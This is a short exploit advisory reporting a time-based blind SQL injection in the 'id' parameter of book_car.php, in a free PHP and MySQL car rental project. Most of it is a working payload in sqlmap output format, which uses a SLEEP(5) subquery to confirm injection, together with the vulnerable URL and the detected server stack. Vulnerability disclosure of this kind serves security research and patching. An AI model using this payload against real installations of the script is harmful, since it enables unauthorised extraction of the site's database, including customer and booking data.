====================================================================
Car Rental Script - Time-based blind SQL injection
====================================================================
####################################################################
.:. Author         : Yussef Dajdaj
.:. Contact        :
.:. Vendor         : https://projectworlds.in/
.:. Script            :  https://projectworlds.in/free-projects/php-projects/car-rental-project-in-php-and-mysql/
.:. Date:             : 8/8/2020
.:. Tested on:   : Tested on: Window 10 64 bit environment || XAMPP
####################################################################


===[ Exploit ]===

[*] SQL injection
=================================

https://localhost/testing/book_car.php?id='[payload<https://localhost/testing/book_car.php?id='%5bpayload>]


Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=' AND (SELECT 4182 FROM (SELECT(SLEEP(5)))dQXQ) AND 'CYlu'='CYlu


the back-end DBMS is MySQL, web application technology: PHP 7.2.32, PHP, Apache 2.4.43